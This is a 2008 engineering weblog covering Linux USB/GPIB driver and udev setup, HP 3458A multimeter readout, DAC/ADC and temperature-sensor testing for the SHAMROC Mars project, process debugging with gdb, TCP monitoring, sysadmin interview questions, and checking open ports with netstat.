Weblog entries 2008

Comments on 2008-05-31 Test for a sysadmin

As part of an interview for a new system administrator, we asked the following questions:

General:

  • Background?
  • With which Unix-like systems have you had experience?
  • How many machines or users?

Administration:

  • Which filesystem does Linux use?
  • What is journalling?
  • What's an inode?
  • What happens when you delete a file while an application has it opened?
  • What is: NFS? NIS?
  • What is Kerberos?
  • Which webserver do you have experience with?

Network:

  • Do you know what OSI layers are?
  • Where does TCP fit in?
  • What is ICMP? Where does it fit in?

Network above layer 4:

  • What is SMTP?
  • What's the difference between IMAP and POP3?
  • Why are both protocols insecure? How do you deal with this?
  • What's DNS?
  • Have you administered DNS servers?
  • What does it mean when a server is authoritative for a domain?
  • How do you look up the name servers for a domain?
  • What are virtual hosts in the HTTP protocol?

Network layer 4 and below:

  • What's the difference between UDP and TCP?
  • What's a gateway?
  • What's a multi-homed machine?
  • If there are two network interfaces on a machine, how many IP addresses can you use?

Security:

  • How do you check for open ports?
  • What is jailing?
  • What is selinux?
  • When is a firewall called for, in your opinion?
  • How would you go about setting up a firewall?
  • What is intrusion detection?

-- Anonymous 2008-05-31 10:40 UTC

2008-12-19 Linux USB device handling

For reading/operating lab instruments like multimeters and power supplies, the GPIB standard is used. This standard defines the type of cabling and connection.

However, interface cards for this type of connection are awkward to get nowadays, and they are being replaced by USB-based GPIB adapters like this one:

http://sine.ni.com/images/products/us/050318_gpib_usb_l.jpg

In this weblog entry, I'll explain what to do when you have a Linux machine and a USB device but, as an application developer, don't know how to continue from there. This is all explained using a USB-based GPIB adapter.

These particular devices are handled on Linux using the default gpib_common.ko kernel module and a device-specific driver which the manufacturer distributes (in this case the ni_usb_gpib.ko module).

However that's not the end of it. When the device is plugged in, it has to be connected to a device file like /dev/gpib0. This is done by loading the modules, loading the firmware (with some particular devices), running the gpib_config utility and setting the correct permissions on the device file.

We want this done automatically on our Debian machines. We already have compiled and repackaged the gpib_common.ko and ni_usb_gpib.ko modules, and have installed these.

First we need to know if the module will be loaded when we connect the device. The kernel handles loading appropriate modules by calling modprobe. Typing the following command can tell you whether modprobe knows what to do when such a device is connected. Replace the 'grep gpib' with 'less' if you don't know what string you're looking for.

 $ modprobe -c | grep gpib

If that's fine, then connecting the device should load the modules. Type the following command to check this, again replacing the 'grep gpib' with something more appropriate:

 $ lsmod | grep gpib

Connect the device and check for changes. If a device driver is loaded, then a udev rule should be written. If not, re-examine the output of the modprobe -c command. An example extract:

 $  modprobe -c | grep gpib
 ...
 alias usb:v3923p702Ad*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
 alias usb:v3923p709Bd*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
 ...

Observing one of those lines a bit closer:

 alias usb:v3923p702Ad*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
            ^^^^ ^^^^
 The vendor ID    The product ID

In my case, no driver got loaded, because the vendor and product numbers output by modprobe don't match the USB device's vendor and product numbers.

To see what the vendor and product numbers of the USB device are, type:

 $ lsusb
 ...
 Bus 007 Device 003: ID 3923:702b National Instruments Corp.
 ...

Check the ID string just before the name of the device (here 3923:702b). The first part is the vendor number, the second part is the product number, both hexadecimal. As you can see, in this case the vendor number matches, but the product number doesn't.

Add a new file in /etc/modprobe.d and then add a line in there which looks like the lines in the existing modprobe configuration. Adapt the vendor and product numbers as necessary. Then type lsmod and connect your device. Type lsmod again to see whether the appropriate driver loaded. If not, did you make a typo in the vendor or product numbers?
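For example, a line matching the 702b product ID seen above could be added like this (the file name below is just an example; modprobe reads any file in /etc/modprobe.d):

```shell
# /etc/modprobe.d/ni_usb_gpib  (example file name)
# Same pattern as the existing aliases, with the product ID changed to 702B:
alias usb:v3923p702Bd*dc*dsc*dp*ic*isc*ip* ni_usb_gpib
```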

Now that the driver is loaded, we go on to writing udev rules. Check the Writing udev rules document for this.

Some tips for writing udev rules follow.

First you find the device details using:

 $ find /sys -name dev  | grep usb

Find the device's path in /sys and use it with udevinfo. Note that some devices require firmware to be loaded; udevinfo will then not show much information, and the device must be identified purely by its product and vendor ID.

 $ udevinfo -a -p /sys/class/usb_device/usbdev2.18/dev

Before you plug/unplug the device, run the udev monitor to see what events are fired off:

 $ udevmonitor

To test whether your rule fires off, use logger in your udev rule:

 SUBSYSTEM=="usb", DRIVERS=="usb", ATTRS{idVendor}=="3923",
   ATTRS{idProduct}=="709b", ACTION=="add",
   RUN+="/usr/bin/logger My rule fires off!"

Note that the above line is actually ONE line, without any linefeeds except at the end.

When you want to load firmware upon connecting the USB device, you might need to pass the location of the device to the firmware loader. It's possible to use the value of sysfs attributes in your RUN or PROGRAM part of the udev rule:

 SUBSYSTEM=="usb", DRIVERS=="usb", ATTRS{idVendor}=="3923",
   ATTRS{idProduct}=="702b", ACTION=="add",
   RUN+="/usr/bin/logger Running /usr/sbin/gpib_config for device
   USB-GPIB-B on bus %s{busnum}, device %s{devnum}"

The %s{...} is substituted with the value of the named sysfs attribute.

2008-12-09 Offset dependency

Last year, I wrote about the Fiske steps routine, which automatically searches for an optimum sensor setting.

For this routine to work, the setting and reading back of voltages and currents has to be very precise. Thus, a 'measure offsets' routine was also developed, but it turns out this routine is going to be a bit more complicated than expected.

Here's an image of the output of the Fiske steps routine:
fiske example.png

We had a hard time today getting the routine to work nicely. The physics student told us that it has to do with the fact that the FFO voltage depends primarily on the FFO bias current, but also, to a much lesser degree, on the FFO control line.

Some background on this. The sensor behaves as a resistor, so setting a particular FFO bias current relates directly to the resulting FFO voltage. This relation becomes less simple when the FFO control line is set. The control line has two influences: running a current creates a magnetic field, and because the copper line at the back of the sensor substrate acts as a resistor, a little heat is given off.

The heating makes the offset somewhat different, and should be taken into account. There's also timing involved: after setting the FFO CL to zero from a high setting, the FFO voltage can be seen slowly dropping from near zero to zero.

2008-11-21 Temperature sensor versus PT1000

One of the tests we do on the temperature sensing ASIC is to measure the difference between the device and a PT1000.

A number of samples is taken from both, and we then do a first-order fit on the resulting two arrays. The offset should be 0 and the gain should be 1; otherwise an error has crept into one of them. For each ASIC sample, we repeat this procedure.

2008-11-04 Bitstream mode

The new project's temperature sensor (tsens) ASIC is basically a Delta Sigma analog-to-digital converter. What it comes down to is that the ASIC measures temperature differences as a 1-bit value. Through calculations, a temperature comes out, but that raw 1-bit value can still be read for verification purposes.

For the coming radiation test, we'll read out lots of things and among them we will be reading out the raw stream of bits.

The FPGA needs to be set in a particular mode for this:

  • Set the drdy_select register to the appropriate socket (the board is outfitted with two sockets, to test two ASICs)
  • Make the buffer for the bitstream empty by setting the buffer_flush register to 1
  • Set the sequencer_mode register to 2, which means bitstream mode
  • Set the buffer_pktsize register to 4, which means that we want four 32-bit words when we read out the buffer
  • Set the bs_mode register to the appropriate socket which starts the measurement

When this is done, the register buffer_read needs to be read out regularly to make sure the buffer doesn't overflow. Each read of the buffer now returns four 32-bit words.
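The register writes above can be sketched as a small helper; write_register here is a hypothetical stand-in for the project's actual FPGA register interface:

```python
def start_bitstream_mode(write_register, socket):
    """Put the FPGA in bitstream mode for the given socket.

    write_register(name, value) is a hypothetical stand-in for the real
    register interface; the names and values are the ones listed above.
    """
    write_register("drdy_select", socket)   # select one of the two sockets
    write_register("buffer_flush", 1)       # empty the bitstream buffer
    write_register("sequencer_mode", 2)     # 2 = bitstream mode
    write_register("buffer_pktsize", 4)     # four 32-bit words per readout
    write_register("bs_mode", socket)       # starts the measurement
```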

Now it's a given that the time for measurements after radiation is very short since the samples can't be out of the radiation too long (otherwise you invalidate the test). Thus we have 60 seconds to do a measurement.

Read for 64 seconds at 8222 bits per readout and you'll get 16444 32-bit words. Each second, a measurement of 8222 bits is done during 0.1 second; for the rest of the second, the tsensor stops measuring and we can read out the buffer. With a buffer packet size of four 32-bit words, that means 4111 reads of 128 bits each.
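As a quick sanity check of these numbers (plain arithmetic, not part of the test software):

```python
# 64 seconds of measuring, 8222 bits per one-second readout cycle:
total_bits = 64 * 8222     # 526208 bits in the buffer
words = total_bits // 32   # 16444 32-bit words
reads = words // 4         # buffer_pktsize = 4 words, so 4111 reads of 128 bits
print(words, reads)        # 16444 4111
```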

A nice thing about the buffer is that it's so big: a whole whopping megabyte is reserved just for the bitstream that comes out of the temperature sensor. If you don't want to disturb the process with communications from the PC, then just let the buffer fill up, wait for a minute and retrieve the whole buffer in one fell swoop.

2008-10-17 adding a logfile

My thought was: adding a logfile to our software within half an hour should be doable. So let's give it a shot!

The server has a debug macro, so obviously it'd be easiest to add it there. The macro expands to a call to a singleton, which emits a Qt signal. It's caught by a class which, amongst other things, writes this stuff to the screen.

That was the first idea, but it turns out someone already made a start using syslog. Before the signal is emitted, I also added a line to write it to syslog.

Update: turns out that's a little shortsighted. I'd like to coin a new law that states that there's always more work involved than you think:

  • Removing useless stuff like date/timestamp, which is added by syslog
  • Mapping our internal log levels to the syslog priority levels

2008-10-16 analyzing a running process

Today I was notified that our custom-developed lab software suite had crashed.

Having a look, it turned out that it hadn't crashed; top showed that it was in fact using 100% CPU time.

First I did an strace on the process, which showed hundreds of lines looking like:

 clock_gettime(CLOCK_MONOTONIC, {836478, 309454188}) = 0
 clock_gettime(CLOCK_MONOTONIC, {836478, 311665927}) = 0
 clock_gettime(CLOCK_MONOTONIC, {836478, 313925541}) = 0

Then I decided to get a stacktrace from the process using gdb:

 labbox1:~$ gdb --pid=17732
 (gdb) bt
 #0  0xb75b3e5d in memset () from /lib/tls/libc.so.6
 #1  0x084dad4a in QTextEngine::LayoutData::reallocate ()
 #2  0x084de989 in QTextEngine::attributes ()
 #3  0x084e8c33 in QTextLine::layout_helper ()
 #4  0x084ea124 in QTextLine::setLineWidth ()
 #5  0x085211e5 in QTextDocumentLayoutPrivate::layoutBlock ()
 #6  0x08527825 in QTextDocumentLayoutPrivate::layoutFlow ()
 #7  0x0852544f in QTextDocumentLayoutPrivate::layoutFrame ()
 #8  0x08525910 in QTextDocumentLayoutPrivate::layoutFrame ()
 #9  0x08525b6c in QTextDocumentLayout::doLayout ()
 #10 0x08525c10 in QTextDocumentLayoutPrivate::ensureLayoutedByPosition ()
 #11 0x08525c98 in QTextDocumentLayout::blockBoundingRect ()
 #12 0x0852ccb6 in QTextCursorPrivate::blockLayout ()
 #13 0x0852ea62 in QTextCursorPrivate::setX ()
 #14 0x0853289d in QTextCursor::deleteChar ()
 #15 0x080b7fe8 in ScriptWindow::showOutput () at src/Debug.cpp:50
 #16 0x080b846f in ScriptWindow::runOutput () at src/Debug.cpp:50
 #17 0x0810afd9 in ScriptWindow::qt_metacall (this=0x8fcc560,
     _c=QMetaObject::InvokeMetaMethod, _id=48, _a=0xbfd419c8)
     at src/moc_Windows.cpp:248
 #18 0x08a14892 in QMetaObject::activate ()
 #19 0x08a14f54 in QMetaObject::activate ()
 #20 0x089a4786 in QProcess::readyReadStandardOutput ()
 #21 0x089a94db in QProcessPrivate::_q_canReadStandardOutput ()
 #22 0x089a997e in QProcess::qt_metacall ()
 #23 0x08a14892 in QMetaObject::activate ()
 #24 0x08a14f54 in QMetaObject::activate ()
 #25 0x08a31b61 in QSocketNotifier::activated ()
 #26 0x08a1a90f in QSocketNotifier::event ()
 #27 0x0832426f in QApplicationPrivate::notify_helper ()
 #28 0x083296b9 in QApplication::notify ()
 #29 0x08a00097 in QCoreApplication::notifyInternal ()
 #30 0x08a258dd in socketNotifierSourceDispatch ()
 #31 0xb78c1731 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
 #32 0xb78c47a6 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
 #33 0xb78c4d27 in g_main_context_iteration () from /usr/lib/libglib-2.0.so.0
 #34 0x08a25a38 in QEventDispatcherGlib::processEvents ()
 #35 0x083a9665 in QGuiEventDispatcherGlib::processEvents ()
 #36 0x089ff0fd in QEventLoop::processEvents ()
 #37 0x089ff37d in QEventLoop::exec ()
 #38 0x08a014e2 in QCoreApplication::exec ()
 #39 0x083249d7 in QApplication::exec ()
 #40 0x0805d809 in main ()

After the weekend, we'll analyze this at our leisure but if anyone has helpful comments, let me know.

Update: today I saw that Debian Package of the Day highlighted memstat which is a tool displaying virtual memory usage. Pity I didn't know this earlier, since it looks really useful.

2008-10-09 Reading out a multimeter part 2

Again busy with the HP 3458A multimeter. The electronics guy suspected that the default settings were actually getting more accurate measurements than our scripts were getting.

The default settings are:

 NPLC 10.000000
 FUNC 1, .1
 APER 0.200000
 RES -1.000000
 LINE 49.985386
 NRDGS 1, 1
 RANGE .1

The above are all functions that influence the measurement accuracy. Some seem to confirm each other; for instance, the NPLC (Number of Power Line Cycles) setting says that we take one measurement every 10 power cycles (at 50 Hz, as the LINE setting says), i.e. 1 sample per 0.2 seconds. That's exactly what the APERture setting displays.
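That consistency can be checked with some quick arithmetic (not something the scripts do; just a verification of the settings above):

```python
# NPLC 10 at the measured line frequency should equal the aperture setting.
line_freq = 49.985386        # Hz, the LINE setting
nplc = 10.0                  # the NPLC setting
aperture = nplc / line_freq  # seconds per measurement: ~0.2 s, matching APER
```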

Then we have the RANGE setting of 0.1 volts, which is what the second result of the FUNC setting says. So that's good too. What's funny though, is the result of the RESolution setting which returns a negative number. Will look into that later.

After talking to our electronics guy, he mentioned that yes, he could pass these settings to the script, but something was still wrong. After the script ended, the multimeter would display a faster measurement rate than before the script.

The problem here is that we end the script with the PRESET NORM command. The PRESET command can set the multimeter in three predefined states. Useful since you have something to turn back to. Unfortunately, the state after power-on isn't predefined. Turns out that's a separate command, the RESET command. OK, so that's fixed.

Next problem: when any script ends, the panel of the multimeter is locked out. Not even the RESET command fixes that. Turns out that's pretty easy: the Unlock button at the front of the meter.

After that another problem crops up: from the ten measurements I get back a variable number of them, anywhere from zero to seven. It probably has something to do with the way the EOI setting is done.

This was not fixable by using the EOI setting although it seemed that way for a while. In this case I found the problem (but not the cause) by sending the ERRSTR? command, where the error was TRIGGER TOO FAST.

The manual says here that the interval from one reading to the next is specified by the SWEEP command. Funny thing is, with an aperture of 0.2 seconds and, say, 10 points, an interval time of somewhat more than two seconds should be enough. But when such a setting is made, the measurement takes up to 20 seconds and no values are actually returned.

I reverted the EOI setting back to 0 and now all the requested measurements are returned. The error TRIGGER TOO FAST still is returned though, and I don't trust the measurements as a consequence. As a workaround, we're now doing one measurement point, which doesn't trigger the error.

Update: after looking at this with a colleague, the issue turns out to be the following. There are two ways to end a reading: through a character such as \n (line feed), or through setting the EOI line high. The first way was being used incorrectly, which caused measurements to be returned while reading simple commands like 'ERRSTR?'. Once that was fixed, simple commands like ERRSTR? were working.

However, it stops working when you request readings in binary format: that format might include that particular character, which is what was causing the early termination of readings.

That's all fine and dandy, but we don't want ASCII transmission of measurements -- we need the binary format since that makes the measurements faster. Roughly, taking a two-second measurement will take six seconds when taking the ASCII route.

This could be fixed by using the EOI line for binary readings. The command END can take care of this; requesting END? results in setting 2. This means: for multiple readings, the EOI line is set true when all measurements have been sent.

Combined this can work as follows:

  1. Open the GPIB device, set the EOS (End-Of-String) to \n
  2. Do some initialization
  3. Before requesting multiple measurements, disable the termination of reads when receiving the EOS (instead rely on the EOI line set high)
  4. After receiving the measurements, enable the EOS again and continue on merry way
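Those four steps could look roughly like this; the device wrapper and its method names (set_eos_detect, write, read) are hypothetical stand-ins, not the actual GPIB library calls:

```python
def read_binary_measurements(dev, command, nbytes):
    """Request measurements in binary format and read them back.

    dev is a hypothetical GPIB device wrapper; set_eos_detect, write and
    read stand in for whatever the real library provides.
    """
    dev.set_eos_detect(False)   # step 3: don't stop reads on the \n EOS;
                                # rely on the EOI line going high instead
    dev.write(command)
    data = dev.read(nbytes)
    dev.set_eos_detect(True)    # step 4: re-enable EOS termination
    return data
```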

Update 2: in the end, we fixed it another way. Instead of letting the read call stop automatically when an EOS character comes by, we just calculate the number of bytes to read. Then do a read call exactly for those. After eliminating the SWEEP command, we also eliminated the TRIGGER TOO FAST error! Hurray!

Also found out that the RES (resolution) setting returns -1 because it's determined automatically from the NPLC setting.

2008-10-03 Software architecture decisions

Today I bumped into a problem which required some decisions about the software. In short it comes down to the following.

We have control scripts (in Perl) which fire off Command Packets to the server. The server is connected to multiple daemons which handle tasks. When receiving a Command Packet, the server broadcasts it to all daemons.

When the daemon replies with a Response Packet, the server broadcasts these to all connected scripts.

Problem is, that broadcast isn't always useful. There could be multiple scripts, giving off commands, and these are all broadcasted. Thus it could be that scripts receive the wrong answer.

Now a solution for this:

  • Create a special packet
  • Eliminate the first broadcast for the new packets
  • Eliminate the second (response) broadcast for the new packets

After some hacking, what remains is the return packet. It shouldn't be broadcasted but the tree of classes seems to point to itself again. Could this be the Friday evening effect?!

Update: partly, it was the Friday evening effect. What was happening is that the return packet is not broadcasted, but instead is neatly redirected back to the sending Connection object.

Currently the Perl library uses a number within the packet, the APID (APplication IDentification), to determine what to do with it. However, APIDs come in two types: hardware and software. Packets with a hardware APID are passed by the daemons straight to the connected hardware, and are currently used for binary data, not ASCII. The software APID is unique per daemon; thus, sending a packet to a daemon needs to include that daemon's software APID.

New planning:

  • Include the software APID when sending packets from the Perl scripts
  • When the response is sent from the daemon, the software APID needs to be set in the response packet.
  • When the response is received in the Perl library, we need to know that when a software APID is present, the packet contents need to be treated in another way

Some important things to remember about this architecture:

  • There is not one single place which maps a particular request to a particular response -- thus it's possible to send packets with one APID, and have the response contain another
  • It's implicit that a request packet triggers a broadcasted response
  • When something else than a hardware APID is sent, the server assumes the packet is meant for the server itself
  • A packet for the server is in the form of two integers, a command and a value (an example of this is the setting of timeouts)

2008-09-22 Reading out a multimeter

We'd like to test the DAC board by reading it out with an HP 3458A multimeter (now Agilent, but this is a pre-spinoff model). It's attached through a GPIB interface with the PC we're running our software on.

hp 3458a.jpg

Currently, we've got some Perl scripts that were used in a previous project; however, we want long integration times for accurate measurements, and the current Perl code doesn't allow this.

The current situation is as follows. The multimeter has a trigger arm event (command TARM), a trigger event (command TRIG) and a sample event (several commands). Normally, all are set to AUTO and the display of the meter shows continuously updating readings. The current code sets TRIG to SYN, which means 'make a reading when GPIB commands you to do so'. Then it does some other setup and, before making a reading, sets TRIG to SGL, which means 'do one measurement, then disable readings'.

The resolution is set more or less automatically because a range (1.2V) is passed when selecting DC voltage measurement. The SWEEP command is then used to take any number of samples.

But now we want to have long sampling times.

The existing solution was to set the APER command (aperture), which has a value between 0 and 1 seconds, specified in 100ns steps.

Since we wanted longer measurement times, we'd use the NPLC command instead. NPLC stands for 'Number of Power Line Cycles'. This is useful since measuring for whole power line cycles reduces noise from the incoming power line.

In The Netherlands, the power from the wall socket has a frequency of 50 Hz. Thus if we want to measure for 100 cycles, we'd measure for two seconds.

Funny thing is, that's not what the script does. There are a number of set-up steps before the measurement is taken and I'd like to eliminate those (or at least, move them to the initialization phase).

There's for instance the RATIO command, which is set to OFF. This command measures both your signal and a reference voltage, then returns the division of those. We don't need this and the default setting is OFF. So I eliminated this command from the script.

To find out whether the ratio setting really defaulted to 0, I tried to read the setting from the multimeter. This worked, but besides the setting I received a load of garbage as well. I'd like to find out why that happens.

2008-09-16 Tweaking TCP

For the Telis project, we use the TCP protocol for the radio uplink. This is rather unusual, since most other balloon flight projects use UDP with their own retransmission and sequencing algorithms.

It has worked well for us previously, but we want to have more insight and diagnostics in a flight situation. Also, there's a backup function present in the software that's running on the PC104 on the balloon. Normally, it's not switched on and we'd like to automatically switch it on when a transmission occurs.

To gain more insight in the quality of the radio uplink, we think iptraf will do fine. A screenshot with the detailed statistics for an interface:

 - Statistics for eth0 ---------------------------
                Total      Total    Incoming   Incoming    Outgoing   Outgoing
              Packets      Bytes     Packets      Bytes     Packets      Bytes
  Total:         3142     621643        1665     131825        1477     489818
  IP:            3142     577645        1665     108505        1477     469140
  TCP:           2903     548408        1434      79900        1469     468508
  UDP:            238      29201         230      28569           8        632
  ICMP:             0          0           0          0           0          0
  Other IP:         1         36           1         36           0          0
  Non-IP:           0          0           0          0           0          0
  Total rates:         51.7 kbits/sec        Broadcast packets:          222
                       30.4 packets/sec      Broadcast bytes:          31189
  Incoming rates:       9.2 kbits/sec
                       15.8 packets/sec
                                             IP checksum errors:           0
  Outgoing rates:      42.5 kbits/sec
                       14.6 packets/sec

Note the IP checksum errors. This one would be pretty interesting for us.

Now what we probably also want, is a way to find out how many resends will occur if the radio uplink fails temporarily. We'd probably want to be gentle and not resend too much since the uplink is pretty limited bandwidth-wise. I have found a way to check this per application (man tcp, search for TCP_INFO) but not per interface.

A nice thing to use for testing purposes is Netem, the Linux kernel's built-in network emulation facility.

2008-08-29 Fighting an ADC

We use an ADC from Cirrus Logic on the DAC board. It's there to check the requirements for noise and linearity of the DAC (and subDACs).

It's the same ADC that we used in the Telis project. It's a nice piece of work, very accurate. For Telis it was used to measure in the hundreds of nanovolts.

dac board adc.jpg

On the DAC board however, there seem to be problems with linearity. Around zero volts, it seems to jump up and down a little. It wasn't just this sample; the ADC was lifted off the board and replaced with another -- the same problem was seen.

The gain on the ADC was lowered and the effect was still seen in the same way, so it's not the DAC that's causing the trouble. This indicates that the ADC or its placement on the board is the problem.

It's probably the latter, since with Telis it worked wonderfully; but that isn't conclusive, because back then the voltage around zero was looked at, though not very carefully.

What we'll now do is firstly use external measurement equipment and secondly, fire off an e-mail to Cirrus Logic support.

Another problem is that the ADC now gives off some REAL funny numbers after some changes in the FPGA. After a full day of analysis with three people (software engineer, FPGA engineer and analogue designer), we come to the conclusion that... the power must be shut down. You'll ask why this wasn't done right away. We did -- except the command that powers off the digital and analogue parts of the board does NOT affect the power of the ADC... That was one of the requirements.

However it remains to be seen whether this fixes the problem of non-linearity around zero.

2008-08-12 Configuring an ADC

On the DAC board, for testing purposes, a Cirrus Logic ADC is present.

It's the same ADC as used in another project. These babies are pretty well-versed feature-wise, as far as my experience goes anyway. The one we use (CS5534) has four channels, each of them with its own configuration registers for selecting measurement time, range selection, offset enablers, offset registers, et cetera.

What's different here is the FPGA in between the software and the ADC. In the previous project, I'd just write the configuration register for a certain voltage range and kick off a macro contained in the FPGA flash. Read back results and voilà.

Occasionally, I'd do those detailed steps in a script and the steps would be:

  • Set voltage range
  • Set measurement time
  • Wait for results
  • Read back results and convert

Currently, it's a bit simpler: just read out and convert.

2008-08-07 Controlling individual DACs

I've written previously about the DAC board, but mainly looking at it as a black box. This time it's time to look at the inner workings.

We perform two tests on the DAC: noise measurements and linearity. The complete range of the DAC is actually covered by five small DACs inside the package, each with a 7-bit range. Normally we just control the main DAC and let the FPGA/DAC combo figure out what happens next, but when the noise and/or linearity tests don't measure up to expectations, we need to look further.

That's why there's a special override register that can be enabled (set to 1) which allows us to control the five small DACs directly. This is done through two 32-bit registers, in a kind of funny way:

First register, called testd1, holds bits 19 to 0 in the table below. Register testd2 holds bits 34 to 20. The highest bit is the most significant bit (MSB).

 bit  meaning
 34   Bit 7 (MSB), DAC 1
 33   Bit 7 (MSB), DAC 2
 32   Bit 7 (MSB), DAC 3
 31   Bit 7 (MSB), DAC 4
 30   Bit 7 (MSB), DAC 5
 29   Bit 6, DAC 1
 28   Bit 6, DAC 2
 27   Bit 6, DAC 3
 26   Bit 6, DAC 4
 25   Bit 6, DAC 5
 24   Bit 5, DAC 1
 23   Bit 5, DAC 2
 22   Bit 5, DAC 3
 21   Bit 5, DAC 4
 20   Bit 5, DAC 5
 ...  ...
 1    Bit 1 (LSB), DAC 4
 0    Bit 1 (LSB), DAC 5

Et cetera. Note the interleaving of bits. Since testers use scripts for this, we need to create a simple function which makes it easy to control the DACs separately.

In the end, I created a function which does the following:

  • Retrieves the current registers
  • Turns the user-requested value into a binary string of ones and zeroes
  • For each bit of the new value the registers are updated
  • When done, the registers are written and activated
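The packing step of such a function could look as follows; this is a Python sketch following the bit layout in the table above, not the testers' actual script:

```python
def pack_dac_overrides(values):
    """Interleave five 7-bit DAC values into the two override registers.

    values[0] is for DAC 1 ... values[4] for DAC 5, each 0..127.
    Returns (testd1, testd2): testd1 holds combined bits 19..0 and
    testd2 holds combined bits 34..20, as described above.
    """
    assert len(values) == 5 and all(0 <= v < 128 for v in values)
    combined = 0
    for d, value in enumerate(values, start=1):  # d = DAC number 1..5
        for b in range(1, 8):                    # b = bit 1 (LSB) .. 7 (MSB)
            bit = (value >> (b - 1)) & 1
            # per the table: bit b of DAC d sits at position (b-1)*5 + (5-d)
            combined |= bit << ((b - 1) * 5 + (5 - d))
    return combined & 0xFFFFF, (combined >> 20) & 0x7FFF
```

Updating a single DAC would then be the read-modify-write variant of this: retrieve testd1/testd2, change only the bits belonging to that DAC, and write both registers back.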

2008-07-01 testing temperatures

Today I configured the housekeeping feature of our Generic EGSE software (stands for Electrical Ground Support Equipment) and added a couple of temperature sensors from the DAC board. I then configured the software to plot the requested values over time; see below.

temp dac.png

Then we sprayed the sensor with Cold Spray and watched the strip chart dive:

temp dac2.png

Time to show our setup:

IMAGE 497.jpg

2008-06-26 Layout Shamroc board

Below are details of the Shamroc DAC testing board.

IMAGE 496.jpg

  1. Daughterboard, for DAC 1 (DAC not present yet)
  2. Daughterboard, for DAC 2 (daughterboard not present yet)
  3. Filtering, plus the high-accuracy ADC is here as well (which measures back whatever the DACs set)
  4. Reference power
  5. Controlling of heaters
  6. Two housekeeping ADCs, with lower accuracy than the one that's located at 3
  7. Power for DACs and filtering
  8. Power supplies
  9. Additional input for power
  10. Barrier
  11. Additional clock input for DACs
  12. Connection from FPGA
  13. Connection from FPGA for the DAC clock signal (40 MHz)
  14. Output DACs
  15. Output reference power

Interesting stuff:

  • If the clock coming from the FPGA won't live up to our expectations during testing, we can use another source and hang it on the connectors marked by 11.
  • The clock from the FPGA is slightly set apart from the bigger data connection, because the harmonics from that 40 MHz signal have a higher chance of interfering with the data lines. Note that at a later time, we'll have a 1 Hz synchronization pulse coming in from outside. This is because our electronics are only part of the whole system and there must be a system-wide clock as well. Otherwise our clocks would deviate as time progresses (think days here).
  • There's another clock coming in at 1.25 MHz for the housekeeping ADCs, on the wide ribbon.
  • The input marked with 9 is there to test the stability of the DACs. We can feed in funny signals and this shouldn't influence the output of the DACs, marked with 14.

2008-06-23 Shamroc DAC board

The DAC testboard for the Shamroc (part of Exomars) project is now under test. This board is meant to test the extremely stable DACs that the project needs. The stability is necessary because the DACs will control the seismometer, which in turn needs very long measurement times. The accuracy of the DACs will thus directly influence the measurements.

Here is a good presentation on the seismometer itself: 9_Smit_GEP-SEIS.pdf

The image below is the test configuration of the seismometer.

seis.jpg

After reading the documentation, I personally was left with a bunch of questions. An appointment tomorrow will change all that.

Questions from a software engineer:

  • What is meant by 'very broad band' seismometers?
  • What is meant by 'seismometers in opposite sensing directions'? Is there a direct relation between the number of ADCs and sensing directions? If so, don't these ADCs have channels for that?
  • Does the GEP-Sphere (the package with the seismometers) contain everything for all directions? How many sensing directions are there?
  • How does the sensitivity compare to earth models?
  • Why is the instrument noise dominated by electronic noise?
  • How should the performance requirements be read?
  • Explanation of the subsystems in the ASIC
  • Why are commercial 24-bit ADCs not really 24 bits? Are we just measuring noise on those highest-accuracy bits? Why? Couldn't we cool it?
  • Why is 1/f electronic noise (pink noise) the biggest problem?

Update following soon.

2008-06-19 Project SHAMROC

For project SHAMROC, part of the Exomars mission, the testing will start next week.

shamroc dac bord.jpg

This project develops mixed-signal ASICs which have DAC, ADC and temperature sensing functions and the first prototypes will arrive next week. I say prototypes, plural, since the functions are divided onto several ASICs for now. Later, these functions will be integrated on a single die.

This is exciting stuff. These electronics have to conform to the highest demands. Since we're talking about a Mars mission, the ASICs will have to operate in extreme temperatures. The weight has to be as low as possible, and the limits on energy consumption force us to use the minimum number of components. And because of the conditions of the trip, as well as the conditions on Mars, the components have to be radiation-hard.

When the ASICs arrive, the software group has a generic workbench for testing them. We'll then work together with the electronics guys to make solid, reproducible tests.

2008-05-31 Test for a sysadmin

As part of an interview for a new system administrator, we asked the following questions:

General:

  • Background?
  • With which Unix-like systems have you had experience?
  • How many machines or users?
  • Can you name some control panels? Which ones have you supported?

Administration:

  • Which filesystem does Linux use?
  • What is journalling?
  • What's an inode?
  • What happens when you delete a file while an application has it opened?
  • What is: NFS? NIS?
  • What is Kerberos?
  • Which webserver do you have experience with?
  • What is a wildcard DNS entry? How would you configure Apache for that?
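The "delete a file while an application has it opened" question can be demonstrated in a few lines of Python. This is just a sketch of the POSIX unlink semantics we'd hope the candidate explains, not part of the interview itself:

```python
import os
import tempfile

# Unlinking removes the directory entry immediately, but the inode and
# its data stay around until the last open file descriptor is closed.
fd, path = tempfile.mkstemp()
os.close(fd)

f = open(path, "w+")
f.write("still here")
f.flush()

os.unlink(path)              # the name is gone at once...
print(os.path.exists(path))  # False

f.seek(0)
print(f.read())              # still here: data readable via the open descriptor
f.close()                    # only now is the inode actually freed
```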

Network:

  • Do you know how to tunnel traffic?
  • Do you know what OSI layers are?
  • Where does TCP fit in?
  • What is ICMP? Where does it fit in?

Network above layer 4:

  • What is SMTP?
  • What's the difference between IMAP and POP3?
  • Why are both protocols insecure? How to handle this?
  • What's DNS?
  • Did you administrate DNS servers?
  • What does it mean when a server is authoritative for a domain?
  • How do you look up the name servers for a domain?
  • What are virtual hosts in the HTTP protocol?

Network layer 4 and below:

  • What's the difference between UDP and TCP?
  • What's a gateway?
  • What's a multi-homed machine?
  • If there are two network interfaces on a machine, how many IP addresses can you use?

Security:

  • How do you stay up-to-date on security news?
  • How do you check for open ports?
  • What is jailing?
  • What is SELinux?
  • When is a firewall called for, in your opinion?
  • How would you go about setting up a firewall?
  • What is intrusion detection?

2008-05-25 Finding open ports

When tightening up security on a Linux server, one of the first things the system administrator does is find out which ports are open. In other words, which applications are listening on a port that is reachable from the network or the internet.

We'll use netstat for this purpose. On a prompt, type:

  $ sudo netstat --tcp --listen -p

Overview of the options:

--tcp Show applications that use the TCP protocol (exclude UDP)
--listen Show only applications that listen, and exclude clients
-p Show the process ID and name of the application to which the port belongs

